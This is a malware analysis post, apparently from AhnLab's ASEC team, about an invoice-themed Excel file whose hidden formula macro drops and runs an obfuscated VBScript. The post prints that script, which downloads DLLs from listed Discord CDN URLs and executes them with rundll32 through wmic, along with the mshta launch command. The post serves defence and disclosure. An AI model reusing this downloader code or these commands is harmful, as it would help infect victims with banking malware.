The ASEC analysis team has recently discovered a malicious Excel file disguised as an invoice. This file is being distributed as an e-mail attachment with the filename of Invoice-[number]_date.xlsb. The following is the malicious e-mail that is being distributed in Korea.
Upon running the Excel file, editing is restricted, prompting users to click the image within the file (see figure below).
As the macro is designated to this image, the user must click the image for the macro to be executed and perform malicious behaviors. Macro1 sheet is hidden, and numerous formulas are divided into different cells within the sheet (see figure 4).
When the user clicks the image, the message shown in the figure below appears. The malicious behavior occurs upon the user clicking either the OK or close button.
The executed macro creates the excel.rtf file in the \%APPDATA%\Microsoft\Excel\XLSTART folder and executes the file using the wmic process call create ‘mshta \%APPDATA%\Microsoft\Excel\XLSTART\excel.rtf’ command.
The excel.rtf file is an html file with several annotations inserted, and it has a malicious VBScript in a form that users cannot easily recognize. The following is the script of unobfuscated excel.rtf file.
<!DOCTYPE html> <html> <head> ---omitted--- <script type="text/vbscript" LANGUAGE="VBScript" > Set hRpLar = CreateObject("Wscript.Shell") fpCHuctA = Replace(hRpLar.expandenvironmentstrings("%LOGONSERVER%"), CHR(92), "") RBfOKtU = hRpLar.expandenvironmentstrings("%USERDOMAIN%") If LCase(fpCHuctA) <> LCase(RBfOKtU) Then For Each WvpdWK in Array("https://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll") Set UWXaoFp = CreateObject("Scripting.FileSystemObject") If Not UWXaoFp.FileExists("C:\\ProgramData\spprgrss.png") Then ---omitted--- with FiTmVH .type = 1 .open .write djGHweg.responseBody .savetofile "C:\\ProgramData\spprgrss.png", 2 .close end with With CreateObject("Wscript.Shell") .Exec("wmic process call create " & Chr(34) & "rundll32.exe C:\\ProgramData\spprgrss.png BrandMe" & Chr(34)) End With ---omitted---
A code that checks the variable value of %LOGONSERVER% and %USERDOMAIN% exists in this script. Because the value is the same for normal users, download does not start. It thus appears that the malware is targeting users with AD environment.
If the set values in %LOGONSERVER% and %USERDOMAIN% are different, additional malicious file is downloaded. The downloaded file is saved as spprgrss.png in ProgramData folder, and executes via wmic process call create “rundll32.exe C:\\ProgramData\spprgrss.png BrandMe”.
The following are download URLs that exist in the script.
Because the URLs above do not work anymore, it is not possible to download additional files. But it is assumed that it downloads banking malware such as dridex.
In addition to the Excel files that contain VBA macro, Excel files that use formula macros as such are consistently being discovered. As always stated, users must refrain from executing email attachments from unknown users. Also, users should be careful not to automatically execute malicious macro included in the file.
AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.